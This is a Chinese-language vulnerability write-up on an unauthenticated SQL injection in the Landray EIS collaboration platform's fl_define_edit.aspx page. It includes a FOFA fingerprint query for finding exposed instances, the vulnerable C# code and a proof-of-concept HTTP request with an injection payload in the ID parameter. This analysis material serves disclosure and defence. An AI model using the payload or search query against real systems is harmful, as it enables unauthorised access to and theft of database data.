简介
蓝凌EIS智慧协同平台是一款专为成长型企业打造的智慧办公云平台,深度融合了阿里钉钉的功能。该平台旨在通过增强组织的协同在线、业务在线和生态在线,提升企业的工作效率和管理便捷性。 蓝凌EIS智慧协同平台 fl_define_edit.aspx存在SQL注入漏洞,未授权攻击者可利用该漏洞获取数据库敏感数据。
影响版本
Landray EIS 2001年至2006年的版本
fofa语法
body="/Scripts/jquery.landray.dialog.js" || icon_hash="953405444"
漏洞分析
关键代码如下
protected override void Page_Load(object sender, EventArgs e)
{
string str1 = this.Request["ID"] == null ? "0" : this.Request["ID"];
string str2 = this.Request.QueryString["assign_recordid"] == null ? "" : this.Request.QueryString["assign_recordid"];
Org org = (Org) ((Control) this).Page.Session["Org"];
this.FIOA_IMG_FOLDER = this.Request.Cookies["FIOA_IMG_FOLDER"].Value;
this.Tree1.ConfigFile = "conf/fl_define_menu_tree_property.xml";
this.Tree1.XMLDataFile = org["flowchar"].Equals((object) "SVG流程图") ? "conf/fl_define_menu_tree_svg.xml" : "conf/fl_define_menu_tree_data.xml";
this.Tree1.PrmData = str1 + (string.op_Equality(str2, "") ? "" : "&assign_recordid=" + str2);
((Control) this.Tree1).DataBind();
if (!string.op_Inequality(str1, "0"))
return;
object obj = (object) Landray.DataAccess.DataAccess.GetOneValue("SELECT name FROM OA_FLOW_DEFINE WHERE ID=" + str1).ToString();
this.form_type = Landray.DataAccess.DataAccess.GetOneValue("SELECT form_type FROM OA_FLOW_DEFINE WHERE ID=" + str1).ToString();
}
直接将 ID ==> str1 拼接进sql语句,造成sql注入漏洞。
漏洞复现
GET /flow/fl_define_edit.aspx?ID=1%20and%201<CHAR(98)%2BCHAR(99)-- HTTP/1.1
Host: landray.mrxn.net



